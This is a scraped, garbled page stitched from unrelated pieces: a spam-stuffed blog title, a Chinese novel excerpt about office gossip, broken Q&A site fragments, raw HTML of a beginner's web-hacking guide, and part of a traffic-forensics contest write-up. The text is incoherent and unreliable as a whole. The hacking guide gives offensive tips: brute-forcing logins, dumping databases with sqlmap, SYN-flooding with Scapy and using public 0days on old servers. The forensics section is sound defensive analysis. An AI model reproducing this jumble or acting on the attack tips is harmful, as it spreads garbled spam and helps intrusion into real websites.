层经的播出地wwW4444kc不管啦,道底是4444kccOm怎么回事(1)_肥皂泡娄_negoti_新浪博客
层经的播出地wwW4444kc不管啦,道底是4444kccOm怎么回事(1)
畅畅听在耳朵里，感到特别刺耳。外地人是有素质不高的，难道就一棒子打死？北京人就没有杀人放火掐死小孩的么？前些日子不还有个北京的售票员掐死一小女孩的么。畅畅知道Sugar是针对自己，不知道哪点得罪她了，觉得挺冤。后来畅畅想了想，小不忍则乱大谋，大不忍必头破血流，自己该做什么做什么。所以，她没搭理Sugar，就当她是一秋后的蚊子，临冻死使劲叫唤，反正也叮不动人。
　　起初办公室里的奔儿头还傻了吧唧地配合她，后来听出来Sugar的用意，又觉得她实在无聊，没几天根本不搭理她。Sugar自讨了个没趣。
　　今天，畅畅和胡林的绯闻传到Sugar的耳朵里，她立刻来了劲，那些社会新闻和这办公室绯闻比起来，简直就是绷弓子和核武器的差别。中午楼下小食堂，Sugar、魏佳和奔儿头吃饭，Sugar迫不及待：“你们知道了吧，老胡和‘苏三’搞上了，昨天老胡的媳妇过来抓奸来了。”
　　“上午菲菲和我说了，哎，我也没想到，发展得这么快。”魏佳谈了口气。
　　“啊？瞎说呢吧，畅畅不是那样的人吧。”奔儿头摇了摇头。
　　“我瞎说？昨天别的公司的人都看见了。再说了，你没发现老胡最近天天让她进去谈话？要不是透明的玻璃，他们俩没准在里面早欢上了。每天最晚走的就是他们俩！”Sugar觉得自己短短两句话，既有人证又有科学分析。
　　“反正我不信，我觉得畅畅挺踏实的！”奔儿头坚持立场，和畅畅接触时间长了，他打心眼里觉得畅畅不错，没见过这么单纯善良的女孩。
　　“你看她踏实？她现在越来越会倒持了，还不是心里长草小鹿直撞。你不了解刚进京的外地小姑娘吧，孤单寂寞无依无靠，特需要有人关心有人爱，‘让我欢喜让我忧’。”
　　“那，至少老胡也不是那种人吧？”
　　“老胡平时很闷，骨子里是闷骚，你忘了，之前据说也有一个小姑娘给开了，就是因为被老胡媳妇发现他俩有一腿。”
　　“是有这么个事，那个时候你们都没来公司呢，我知道。”魏佳补充一句。
　　“对吧。我就说么，一个巴掌是单相思，那能拍得响么。他们俩典型干柴遇上烈火，可惜啊，正着着呢，来了一大灭火器。”
　　　　三人正起劲儿聊着，畅畅打了饭凑过来，“你们聊什么那，这么开心？”
　　“没什么，正在聊明星绯闻呢。”Sugar回了一句，两外两个人闷头吃饭。
　　“哪个明星呀？”
　　“周杰伦和蔡依林呀。”Sugar昨天刚看完《每日八卦播报》。
　　“啊，周杰伦不是和侯佩岑么？”
　　“早分了，中了爱情36计，迷上舞娘的72变了呗。”
　　“哎，都挺不靠谱的。”
　　“那可不么，看着靠谱的才不靠谱呢。人家周杰伦现在是周董，当领导的，当然招妞儿了。”Sugar含沙射影。
　　“你这话什么意思？”畅畅听出Sugar话里有话。
　　“没什么意思啊，我们就是八卦一下娱乐明星。这年头，闹绯闻的才叫明星，没绯闻的那叫过气。哪天你要成名了，也得学会顶得住舆论压力。”
　　“谢谢！我觉得你想得太多了。”畅畅把筷子往桌上一放，饭也不吃扭头走了。
　　“Sugar你过了啊，她也挺不容易的。”奔儿头看不下去了。
　　“是啊，还住地下室，怎么说也是个小孩。”魏佳也劝Sugar。
　　“小孩？该长的都长了，胸都比奔儿头你大了，心眼儿比咱三加一起都多。还小孩？歇菜吧歇菜吧。”Sugar来了劲。
　　　　下午办公室里气氛不算融洽有些尴尬，大家谁都不说话，只能听到键盘的噼里啪啦。胡林进来看大家都埋头做事，也没像平时还嘱咐两句工作，自己闷头走进自己的小屋。
　　畅畅正看销售数据，魏佳在QQ上给自己发了一条小信息：别理丫的，丫腰子吃多了，有股妖气。畅畅，我相信你是清白的。
　　畅畅看到，心里温暖了一下，就在QQ上把事情经过和魏佳说了一遍。
　　魏佳安慰了她：明白了。没事啊畅畅，以后稍微注意点呗，晚上尽量别给领导发消息或打电话，有事发个伊妹儿就行了。
　　畅畅赶紧感谢了一下魏佳，然后把她的提醒记住记事本上。
　　没一会儿，奔儿头也发来特长的鼓励短信：Sugar那人你也知道，拿臭豆腐就着大蒜当饭吃，嘴太招人讨厌了。畅畅同学，我们都知道这事是场误会，别往心里去，有不顺心的事告诉杨二哥哥。
　　抬头看了奔儿头一眼，畅畅发现他也正在看着自己。奔儿头冲畅畅做了个小鬼脸，畅畅乐了，给回了一条：我想得开，老碰到对你好的，也没劲。谢谢二哥！
　　畅畅后来想了想，生活可能就是这样，绝不会让你一帆风顺的。这个世界因为有了像Sugar、像胡林夫人这样五花八门的人，才变得丰富多彩。或许有一天还应该感激她们，让自己学到了很多。工作中难免碰到烦心事，自己想开点，就能抛除杂念，全心工作了。
　　好在，八卦的精神在于推陈出新，绯闻这事过了一段时间就没人再提。胡林两口子开始分居冷战，他和畅畅的关系也逐渐恢复到正常工作的状态。
　　　　从畅畅来到“哈佛”，公司的业绩突然爆发了一下，十月和十一月两个月招了600多人。
　　孙大力每天屁颠屁颠地过来看看报表，没事就在办公室里喝茶开小会，今天又把胡林喊来开小会。孙大力一本正经地说：“胡林，我看这俩个月做得有些起色，你知道我在想什么么？”
　　胡林摇了摇头，心想连点提示都不给，我能知道你想什么，反正你不会想着给我加薪。
　　“我觉得我们还能做得更好。我们不能只满足于每个月招300人，我觉得至少我们有实力每个月招这个数。”孙大力伸出一个巴掌。
　　“500人？”胡林吓了一大跳，孙大力这么说分明是给自己增加了很大的压力，同时也间接抹去了过去俩个月的成绩。
　　“对。500人我觉得对我们的课程来说，应该没问题。我当年做销售的时候，公司里业绩最好的人一个月做20单。我就给自己定了个高目标，一个月做30单！结果，我一个月下来做到了35单。这就说明，把目标提高一些，结果就会多一些。胡林，这次我要你们部门把潜力发挥出来。对你也是一个很好的机会，你说呢？”
　　“孙总说的对，人的潜力是很大。只是…目前来看年底招聘会越来越少…形势比较严峻。”胡林想，我可不能顺着你。
　　“这我也考虑到了，所以我们可以尝试一些新的手段，更大胆的手段。我前两天看湖南台‘超女’，我看到北大青马的广告了。我就在想，人家也是搞培训的，咱们也是搞培训的，虽然内容不一样，但是也可以尝试一下电视广告。”
　　“对对，我觉得电视广告虽然成本比较高，但是力度大，面儿广。”胡林长出一口气，电视广告投入大，就会有很大保证。
　　“是啊，这不是年底快到了么，我估计很多人也在为明年的充电做准备。特别是那些混得不咋地的，肯定想明年有所突破。你看看，能不能结合这些人的需求，做一个电视广告，在新年的时候播出。”
　　“孙总说得对，我这就去落实。”
　　“这个事吧，关系到公司的一季度的销售和品牌形象。你稳着点，你们市场部出方案，论证通过之后找广告公司的人拍就行。当然了，既然咱们要做，就要做好，不要怕花钱，就怕没效果。就算是请赵本山，请成龙都没关系，关键看效果。”
　　“行！”
　　21.关于电视广告的讨论
　　胡林回去之后马上开了个会，传达了老板的原话，让大家想创意做策划去，明天开会讨论。大家知道公司要拍电视广告的事后，极为兴奋，散会后开始议论。
　　畅畅问：“真能请赵本山啊？那我让他给我妈签个名。”
　　“当然能，等咱公司上了市吧。”奔儿头回了一句。
　　“哦~那咱公司什么时候能上市啊？”
　　“咱改行摊煎饼，明天就能上市，早市。”魏佳插了一句。
　　“那也不错，早点有着落了。”
鑲ョ殏娉″▌_negoti
博客等级：
博客积分：0
博客访问：15
关注人气：0
荣誉徽章：怎么www今天显示4444kt空白页啊，打开的4444kt是com不稳定_百度知道
怎么www今天显示4444kt空白页啊，打开的4444kt是com不稳定
我有更好的答案
甬的\\ 以备用滴在★；【15sddd】殿岸【c,,o\\&#92
采纳率：100%
为您推荐：
其他类似问题
空白页的相关知识
换一换
回答问题，赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。&p&黑客也分很多领域，这里先不讲门槛较高的系统领域的安全【因为我也不会……】，讲下Web下的安全。&/p&&p&首先大喊一句!&b&Python大法好!&/b&&/p&&p&零基础的话建议从Python这种语法简单脚本语言入门，Python入门可以看这里。&/p&&p&&a href=&//link.zhihu.com/?target=http%3A//www.liaoxuefeng.com/wiki/958fa6d3a2e542c000& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Python教程&/a&,&a href=&//link.zhihu.com/?target=http%3A//www.kuqin.com/abyteofpython_cn/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&简明 Python 教程。&/a&&/p&&p&好的，当你入门Python语法后你可以去阅读那些dalao们写的库,论对一个网站渗透首先应该收集他的信息，因为只有收集一个网站信息才能针对攻击。那么Python爬虫就是一大利器，利用爬虫收集一个网站的架构是非常重要的。首先是大名鼎鼎的Scrapy。&a href=&//link.zhihu.com/?target=https%3A//github.com/scrapy/scrapy& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&scrapy/scrapy&/a&&/p&&p&当然这里不讲scrapy，因为我比较喜欢用Python3，有请 非转基因的 Python HTTP 库 &b&requests&/b&!&/p&&p&&a href=&//link.zhihu.com/?target=http%3A//cn.python-requests.org/zh_CN/latest/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Requests: 让 HTTP 服务人类&/a& 以及&b&美味汤&/b&!&a href=&//link.zhihu.com/?target=http%3A//beautifulsoup.readthedocs.io/zh_CN/latest/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Beautiful Soup 4.4.0 文档&/a& ，利用Requests和Beautiful Soup可以爬到一个网站的架构，比如你想识别网站指纹信息，你可以用提取出的文档进行&b&正则表达式&/b&匹配，尝试匹配下面Dom节点&/p&&div class=&highlight&&&pre&&code class=&language-html&&&span class=&nt&&&meta&/span& &span class=&na&&name=&/span&&span class=&s&&&generator&&/span& &span class=&na&&content=&/span&&span class=&s&&&Discuz! X3.3&&/span& &span class=&nt&&/&&/span&
&/code&&/pre&&/div&&p&又或者可以去尝试访问下网站的robots.txt，查看是否有敏感目录，或者暴露了CMS。&/p&&p&嗅探一个网站的IP时候可以用Ping &a href=&//link.zhihu.com/?target=http%3A//hostname.com& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&hostname.com&/span&&span class=&invisible&&&/span&&/a& 这种方法,或者用nslookup &a href=&//link.zhihu.com/?target=http%3A//hostname.com& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&hostname.com&/span&&span class=&invisible&&&/span&&/a& dns，不过现在大多数使用了CDN，真实IP也不是很好找了。当然这些操作可以集成到你的Python脚本里。IP找完，可以尝试找找开放了哪些端口，在Python脚本里造一个端口List，然后使用&a href=&//link.zhihu.com/?target=https%3A//github.com/secdev/scapy& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&secdev/scapy&/a&进行发包 FB上有这么一篇文章很不错&b& [&a href=&//link.zhihu.com/?target=http%3A//www.freebuf.com/sectool/94507.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&如何用Scapy写一个端口扫描器？ - FreeBuf.COM | 关注黑客与极客&/a&] &/b&最后Requests.headers里可以在响应包里找到Server名字。做完了这些你想找下网站的后台路径，又或者你找到了登入点想爆破他但苦于没有字典，看这里 &a href=&//link.zhihu.com/?target=https%3A//github.com/rootphantomer/Blasting_dictionary& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&rootphantomer/Blasting_dictionary&/a& Requests就可以做到,记得要用Proxies选项。&/p&&p&说到黑客你第一联想是什么，大概就是DDos吧&b&【《破坏之王ddos攻击与防范深度剖析》】&/b&感觉电视报道老是有这个名词。你会使用Requests疯狂进行Sql查询请求，你会使用Scapy库进行Syn泛洪攻击，但你总感觉少了点什么。没错作为黑客掌握TCP/IP协议是非常重要的 &b&《TCP/IP详解 卷一》, &/b&当然我承认这本书有些枯燥，所以我们使用&b&Wireshark&/b&配合食用，一边分析一边学习。关于那本HTTP圣经实在太厚了，以后说不准你还会当砖头敲人:) 所以我推荐了解Http协议看这本 &b&《图解http》&/b&当然你有&b&兴趣&/b&的话看下&b&《CCNA学习指南》&/b&也是很好的。&/p&&p&关于嗅探方面其实前人早就写出了超强的工具，比如Nmap，Whatweb，知道创宇的ZoomEye也是非常厉害的工具，有兴趣可以自己找资料学习。这里要讲下为什么渗透前要收集信息，一个网站可以由很多模块组成，假如一个模块出现了漏洞，那么整个系统就会遭殃，毕竟通往权限的路不止一条[括弧笑]，如果这个网站的服务器版本过老，那么你可以用网上存在的0day攻击，分分钟教他做人，其他模块同理。你甚至可以模拟一个网站的搭建环境，自己本地测试 【过多请求人家直接ban了你，你也就干瞪眼了23333】&/p&&p&接下来讲下OWASP几个高危问题吧，Sql注入，以前非常l普通的高危漏洞，现在基本没啥了。&b&我认为&/b&原理在于输入点，&b&未净化用户输入的内容，将数据以命令的方式进行执行&/b&，简单来说你就在一个输入点不停执行sql查询命令，把这个网站什么用户信息，什么密码都给倒出来。Sqlmap应该是sql注入最强大的工具了，网上有很多食用资料。Github有源码可以自己阅读，学习payload &a href=&//link.zhihu.com/?target=https%3A//github.com/sqlmapproject/sqlmap& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&sqlmapproject/sqlmap&/a& ，看完怕不是通杀Sql注入漏洞。当然你也可以写个Python脚本自己简单检测下网站是否存在sql注入，然后用sqlmapapi进行批量执行。&/p&&p&XSS，关于这个需要有一定的javascript基础，推荐看 &b&《javascript dom编程艺术》，我认为&/b&，xss也是对输入点未净化造成的，比如 &/p&&div class=&highlight&&&pre&&code class=&language-js&&&span class=&o&&&&/span&&span class=&nx&&input&/span& &span class=&nx&&value&/span&&span class=&o&&=&/span&&span class=&s2&&&你可以控制的地方&&/span& &span class=&o&&/&&/span&
&/code&&/pre&&/div&&p&这个地方value是你可以控制闭合的。前提是未过滤，这样你就可以腾出来空间执行自己脚本，当然xss这玩意姿势很多，我一个菜鸟就不献丑了，推荐这里 &a href=&//link.zhihu.com/?target=http%3A//wy.hx99.net/search%3Fkeywords%3D%25E9%%25E4%25BA%259B%25E5%25B9%25B4%25E6%E4%25BB%25AC%25E4%25B8%%25B5%25B7%25E5%25AD%25A6XSS%26content_search_by%3Dby_bugs& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&华西安全网--wooyun漏洞报告平台搜索--乌云WooYun镜像站&/a& 作者良心啊!&/p&&p&长短短在Github上分享了他的xss思路图，我不知道能不能贴出来就先不贴了……&/p&&p&至于其他类似逻辑漏洞和路径遍历等等漏洞，一会在下面列出的书去学习吧 :)&/p&&p&说下工具吧，sql注入的神器 &b&Sqlmap&/b&，收发包神器&b&Burpsuite，&/b&&/p&&p&其实安装个kali linux比较方便，集成了很多安全工具，更有Metasploit大名鼎鼎的渗透框架。&/p&&p&嘛。linux学习肯定是必要的，当然初期我认为能使用常用命令就足够了。&b&《鸟哥linux的私房菜》&/b&可以当字典翻阅，没事还能垫枕头，实在不行还能砸人。&/p&&p&当然零基础跟着一本书学习是很好主意。&/p&&p&重点讲了前端安全问题的大作！ &b&《web前端黑客技术揭秘》&/b&&/p&&p&能够打开你的任督二脉倚天屠龙之作 &b&《黑客攻防技术宝典 web实战篇》&/b&&/p&&p&能让你Python信仰加成的&b& 《Python黑帽子》&/b&&/p&&p&你也许想像电影里的黑客那么炫酷的 &b&《Metasploit渗透测试魔鬼训练营》&/b&&/p&&p&周末闲暇时光不如来一本 &b&《社会工程:安全体系中的人性漏洞 》&/b&&/p&&p&最后一本 《黑客从入门到放弃》:-P&/p&&p&推荐一下Github上有助于新手的项目&/p&&p&&a href=&//link.zhihu.com/?target=https%3A//github.com/We5ter/Scanners-Box& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&We5ter/Scanners-Box&/a&&/p&&p&以及曾经的光芒&/p&&p&&a href=&//link.zhihu.com/?target=http%3A//wy.hx99.net/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&华西安全网--wooyun漏洞报告平台搜索--乌云WooYun镜像站&/a&&/p&&p&闲暇之余为什么不去FB喝杯酒呢&/p&&p&&a href=&//link.zhihu.com/?target=http%3A//www.freebuf.com/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&FreeBuf.COM | 关注黑客与极客&/a&&/p&&br&&br&&br&&br&&br&&br&&p&如果有错误请各位dalao指出。想到也就那么多了吧，以后想到什么再更新。求赞
(づ￣ ?￣)づ&/p&
黑客也分很多领域，这里先不讲门槛较高的系统领域的安全【因为我也不会……】，讲下Web下的安全。首先大喊一句!Python大法好!零基础的话建议从Python这种语法简单脚本语言入门，Python入门可以看这里。,好的，当你入门Python语…
&p&[NEW]Apr 26
13-16题 telnet爆破和木马上传提权已补充&/p&&p&[NEW]Apr 25
8-12题 ftp爆破已补充
[INFO]Apr 24
数据包已上传，链接：&a href=&//link.zhihu.com/?target=http%3A//pan.baidu.com/s/1hrLgSYS& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&pan.baidu.com/s/1hrLgSY&/span&&span class=&invisible&&S&/span&&span class=&ellipsis&&&/span&&/a& 密码：6hjs
[NEW]Apr 24
5-7题黑客攻击时间和方式分析已补充&/p&&p&本人曾参加过一次某省的数据分析赛，大意就是给你几个数据包，然后从中&b&分析出黑客的ip，进行了什么操作，取走了什么东西&/b&之类的。
这通常是用来找到黑客的一种方式。下面就详细讲一下这个分析的过程。&/p&&p&pcapng格式的数据包分为5份，记录了5天经过某公司服务器的所有数据流，包括tcp/udp/http/ftp/ssh等所有类型协议的数据包。其大小达到60G。由于数据包过大，所以这里另外找了一个比较简单的数据包题目来对分析过程进行简单还原，分析的思路过程都是一样的。&/p&&h2&0x00 首先是题目&/h2&&figure&&img src=&https://pic2.zhimg.com/v2-ea970cf0d1d0b1a6d7a963d82d0f82f1_b.png& data-rawwidth=&1198& data-rawheight=&777& class=&origin_image zh-lightbox-thumb& width=&1198& data-original=&https://pic2.zhimg.com/v2-ea970cf0d1d0b1a6d7a963d82d0f82f1_r.png&&&/figure&&p&提供的数据包&/p&&figure&&img src=&https://pic4.zhimg.com/v2-5ac3b5f6e4ba75fb29dec5ba_b.png& data-rawwidth=&735& data-rawheight=&141& class=&origin_image zh-lightbox-thumb& width=&735& data-original=&https://pic4.zhimg.com/v2-5ac3b5f6e4ba75fb29dec5ba_r.png&&&/figure&&p&将数据包放到wireshark里查看&/p&&figure&&img src=&https://pic3.zhimg.com/v2-81c62aafcbbc892f98b08e_b.png& data-rawwidth=&1920& data-rawheight=&1030& class=&origin_image zh-lightbox-thumb& width=&1920& data-original=&https://pic3.zhimg.com/v2-81c62aafcbbc892f98b08e_r.png&&&/figure&&p&上半部分是各协议数据流，在protocol下显示了协议的名称，source和destination显示了发生源地址和目的地址，info显示了协议的详细信息，右键任意一行数据可已查看数据包的完整信息。&/p&&p&下半部分就是物理层、链路层、传输层、应用层等详细信息。&/p&&h2&0x01 题目1-4 判断黑客身份和行为&/h2&&ul&&li&第1题：某公司信息系统存在异常，于是请求你立即对数据进行分析，从中发现有黑客尝试对主机进行扫描，请从数据包1中找到黑客的IP &/li&&li&第2题：通过对攻击ip进行过滤，请问攻击的扫描方式是什么？（如：目录扫描）&/li&&li&第3题：获取到那些开放的端口，请从1-60000依次列出（如：77/99/188/）&/li&&li&第4题：并获取到了服务器部分的信息，请问服务器的操作系统是什么？（如：windows7)&/li&&/ul&&p&首先题目1告诉有黑客尝试对主机进行扫描，那么我们知道主机扫描一般就是发送TCP包，看目标主机是否回应，来判断目标主机或目标端口是否开启&/p&&p&TCP三次握手的过程就是&/p&&ul&&li&源==》SYN==》目标&/li&&li&源《==SYN ACK《==目标&/li&&li&源==》ACK==》目标 &/li&&/ul&&p&当这三个过程完成后源和目标就建立了连接。&/p&&h2&端口存活判断方式&/h2&&p&那么扫描时如何判断目标是否开启呢？&b&就看哪方先发出RST包&/b&&/p&&p&在TCP协议中RST表示复位，用来异常的关闭连接，在TCP的设计中它是不可或缺的。发送RST包关闭连接时，不必等缓冲区的包都发出去，直接就丢弃缓存区的包发送RST包。而接收端收到RST包后，也不必发送ACK包来确认。
&/p&&p&比如在主机241向主机114发送一个SYN请求，表示想要连接主机114的40000端口，但是主机114上根本没有打开40000这个端口，于是就向主机241发送了一个RST。&/p&&ul&&li&源==》SYN==》目标 &/li&&li&源《==RST ACK《==目标 &/li&&li&连接请求中断，判断目标未开启&/li&&/ul&&p&而当主机114的40000端口开启时，就会向主机241返回SYN ACK包。但是主机241并不是真的想和40000端口建立连接，这时主机241就会主动发出一个RST包来中断连接，并判断目标端口开启。&/p&&ul&&li&源==》SYN==》目标 &/li&&li&源《==SYN ACK《==目标 &/li&&li&源==》RST==》目标 &/li&&li&连接请求中断，判断目标开启&/li&&/ul&&p&&b&简而言之，当目标机发送RST时，目标未开启。当源发送RST时，则可判断目标开启&/b&&/p&&h2&&b&数据分析&/b&&/h2&&p&查看tcp包发现192.168.1.136这个地址的47665端口向192.168.1.107的各个端口发送了大量的tcp连接请求，那么我就可以判断这192.168.1.136在进行端口扫描了&/p&&figure&&img src=&https://pic3.zhimg.com/v2-fb1df8bed41c9a6334331e_b.png& data-rawwidth=&1898& data-rawheight=&906& class=&origin_image zh-lightbox-thumb& width=&1898& data-original=&https://pic3.zhimg.com/v2-fb1df8bed41c9a6334331e_r.png&&&/figure&&p&然后使用语句&/p&&div class=&highlight&&&pre&&code class=&language-text&&tcp.connection.rst and ip.src==192.168.1.136
&/code&&/pre&&/div&&p&即可查看192.168.1.136发出的RST包&/p&&figure&&img src=&https://pic3.zhimg.com/v2-fdd910fceb0646_b.png& data-rawwidth=&1854& data-rawheight=&904& class=&origin_image zh-lightbox-thumb& width=&1854& data-original=&https://pic3.zhimg.com/v2-fdd910fceb0646_r.png&&&/figure&&p&这里列出的被发送RST包的端口就是开启的端口了，在info里可以看到有135/139/445/02/152///49157&/p&&p&在192.168.1.136访问192.168.1.107的网站时返回的http包中发现了apache服务器是Win32位的，可以判断这个服务器是WinServer2K3或XP的，是相当老的服务器了。&/p&&figure&&img src=&https://pic3.zhimg.com/v2-9ad56a3b96d97b5e9d5c5c99a5b5ee66_b.png& data-rawwidth=&1004& data-rawheight=&470& class=&origin_image zh-lightbox-thumb& width=&1004& data-original=&https://pic3.zhimg.com/v2-9ad56a3b96d97b5e9d5c5c99a5b5ee66_r.png&&&/figure&&p&所以1-4题的结果就是&/p&&ul&&li&第1题：某公司信息系统存在异常，于是请求你立即对数据进行分析，从中发现有黑客尝试对主机进行扫描，请从数据包1中找到黑客的IP &/li&&ul&&li&192.168.1.136&/li&&/ul&&li&第2题：通过对攻击ip进行过滤，请问攻击的扫描方式是什么？（如：目录扫描）&/li&&ul&&li&端口扫描&/li&&/ul&&li&第3题：获取到那些开放的端口，请从1-60000依次列出（如：77/99/188/）&/li&&ul&&li&135/139/445/02/152///49157&/li&&/ul&&li&第4题：并获取到了服务器部分的信息，请问服务器的操作系统是什么？（如：windows7)&/li&&ul&&li&Windows Server 2K3或XP&/li&&/ul&&/ul&&p&现在我们知道了黑客用来扫描的IP是192.168.1.136，这是一个内网IP，所以这个黑客要么是内鬼要么就是肉鸡。接下来就是清查这台肉鸡的网络日志，再一级一级地溯源了。&/p&&p&除了肉鸡，也有黑客会开代理，那么网警就会联系代理服务商要求提供网络日志来溯源。私人代理是很容易被查到的，公用代理则会使追查工作难上许多。&/p&&p&这27个题目的数据包大小不过867M，在有题目提示方向的情况下我最开始花了4个小时才将题目全部做完。&/p&&p&在真实情况下，对于动辄上百G的数据包还需要一条一条地慢慢过滤，其耗费的人力和时间成本是十分巨大的。&/p&&p&=====================================================================&/p&&h2&0x02 5-7题 分析黑客攻击方式和时间&/h2&&ul&&li&第5题：黑客扫描完后直接对服务器发起了攻击，请分析数据包2，分析黑客的攻击方式&/li&&li&第6题：通过分析数据包2，请对数据包2做出详细分析，请根据攻击时间进行排序（格式：协议名/协议名/协议名）【icmp可忽略】&/li&&li&第7题：通过分析数据包2，,现公司希望能够知道黑客什么时候第五题的攻击和什么时候结束第五题的攻击，（格式：18:44:52/19:05:02）&/li&&/ul&&p&这几个题目比较简单，刚刚对服务器进行了端口扫描，那么下一步就是针对这些端口服务发起攻击了。&/p&&p&有经验的安全研究人员（黑阔）都知道&/p&&h2&比较常见的端口服务攻击有&/h2&&ul&&li&21端口ftp服务——爆破&/li&&li&22端口ssh隧道连接服务——爆破&/li&&li&23端口telnet远程登陆服务——嗅探/爆破&/li&&li&80端口网站服务——通过渗透网站来获取服务器shell&/li&&li&139/445SMB服务器消息块——未修复、老版本的服务器有可利用模块&/li&&li&3389远程桌面登陆&/li&&/ul&&p&在上面的分析中发现192.168.1.7的80端口并未打开，而是在8899端口开启了网站服务&/p&&figure&&img src=&https://pic4.zhimg.com/v2-da29caa3c69f7c2cec4fa9c5f16ef49b_b.png& data-rawwidth=&958& data-rawheight=&186& class=&origin_image zh-lightbox-thumb& width=&958& data-original=&https://pic4.zhimg.com/v2-da29caa3c69f7c2cec4fa9c5f16ef49b_r.png&&&/figure&&p&我们知道的开启的端口有135/139/445/02/152///49157&/p&&p&其中只有139/445是SMB服务，8899是网站服务，3306是MySQL数据库服务，其他的暂不明含义，因此我们分析黑客在此时可发起的攻击只有针对SMB服务和网站两种。&/p&&p&在前面我们发现黑客在扫描完后就立刻访问了192.168.1.107下的网站，那么我们可以推测他是打算从网站下手，所以优先检查http数据流（这里只一种简单思路，为了保险起见应当更详细地去检查）&/p&&p&检索数据包2，发现只有两条关于192.168.1.136的信息&/p&&figure&&img src=&https://pic1.zhimg.com/v2-02f9bd72fd57c98e6cad3fa_b.png& data-rawwidth=&1228& data-rawheight=&107& class=&origin_image zh-lightbox-thumb& width=&1228& data-original=&https://pic1.zhimg.com/v2-02f9bd72fd57c98e6cad3fa_r.png&&&/figure&&p&所以推断黑客在这里换了另一台肉鸡来进行操作，那么怎么才能找到黑客的新马甲呢？那就只有从192.168.1.107服务器数据流逐一反查了........&/p&&h2&找到黑客的新马甲&/h2&&p&在真实情况下，一台服务器每天接收和发出的数据量是非常巨大的，所以逐一反查是非常耗时的，不过我也只能想到这种方法了，我觉得应该有更简便的方法。&/p&&p&一看经过192.168.1.107的数据流，就发先192.168.1.108向其发送了大量的ICMP和UDP包，UDP包发送的内容都是长文本，这里应该是在ping服务器了，先将192.168.1.108列为嫌疑对象。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-b042a93dab3f935ee9b8b_b.png& data-rawwidth=&1894& data-rawheight=&910& class=&origin_image zh-lightbox-thumb& width=&1894& data-original=&https://pic4.zhimg.com/v2-b042a93dab3f935ee9b8b_r.png&&&/figure&&br&&figure&&img src=&https://pic3.zhimg.com/v2-f775eaef7b601f05d84e6d24c881e986_b.png& data-rawwidth=&782& data-rawheight=&633& class=&origin_image zh-lightbox-thumb& width=&782& data-original=&https://pic3.zhimg.com/v2-f775eaef7b601f05d84e6d24c881e986_r.png&&&/figure&&p&一直下拉，就发现192.168.1.108在访问网站了，查看http包，发现访问地址全都是/jscgnr.php?id=1，返回状态码全部为431&/p&&figure&&img src=&https://pic3.zhimg.com/v2-a3f8b08ecf5d3e3b9a40f57a6b3d4556_b.png& data-rawwidth=&1150& data-rawheight=&597& class=&origin_image zh-lightbox-thumb& width=&1150& data-original=&https://pic3.zhimg.com/v2-a3f8b08ecf5d3e3b9a40f57a6b3d4556_r.png&&&/figure&&p&431状态码表示Request Header Fields Too Large (请求头字段太大)，就算不知道这个，一看到php?id=1哪怕是个刚接触Web安全的小白都知道他在干嘛了。192.168.1.108就是新马甲没跑了。&/p&&h2&攻击时间&/h2&&p&这个是作为证据，并为修复提供参考。&/p&&p&从第一次注入到最后一次注入的数据流，点击查看物理层信息，即可知道开始时间和结束时间&/p&&figure&&img src=&https://pic4.zhimg.com/v2-057cdcf16ce420bdc2ab_b.png& data-rawwidth=&630& data-rawheight=&155& class=&origin_image zh-lightbox-thumb& width=&630& data-original=&https://pic4.zhimg.com/v2-057cdcf16ce420bdc2ab_r.png&&&/figure&&br&&figure&&img src=&https://pic4.zhimg.com/v2-fbba8561c1ece9ac67fd8a863ceefbcf_b.png& data-rawwidth=&708& data-rawheight=&167& class=&origin_image zh-lightbox-thumb& width=&708& data-original=&https://pic4.zhimg.com/v2-fbba8561c1ece9ac67fd8a863ceefbcf_r.png&&&/figure&&p&所以此次注入从20:20:05开始到20:21:10结束，历时65秒。在如此短的时间内进行了上百次注入，所以肯定是工具注入。&/p&&p&所以5-7题结果是&/p&&ul&&li&第5题：黑客扫描完后直接对服务器发起了攻击，请分析数据包2，分析黑客的攻击方式&/li&&ul&&li&SQL注入&/li&&/ul&&li&第6题：通过分析数据包2，请对数据包2做出详细分析，请根据攻击时间进行排序（格式：协议名/协议名/协议名）【icmp可忽略】&/li&&ul&&li&TCP/UDP/HTTP&/li&&/ul&&li&第7题：通过分析数据包2，,现公司希望能够知道黑客什么时候第五题的攻击和什么时候结束第五题的攻击，（格式：18:44:52/19:05:02）&/li&&ul&&li&20:20:05/20:21:10&/li&&/ul&&/ul&&p&还有一个有趣的事情是，在20:21:10最后一次注入后，发现了服务器向其返还了大量的RST包，所以黑客后来没有继续攻击的原因应该是&b&访问请求被防火墙拦截&/b&了&/p&&figure&&img src=&https://pic2.zhimg.com/v2-78fe247c5fd2e6fda95d34eeadcf2261_b.png& data-rawwidth=&600& data-rawheight=&57& class=&origin_image zh-lightbox-thumb& width=&600& data-original=&https://pic2.zhimg.com/v2-78fe247c5fd2e6fda95d34eeadcf2261_r.png&&&/figure&&br&&p&==================================================================&/p&&p&0x03 8-12题 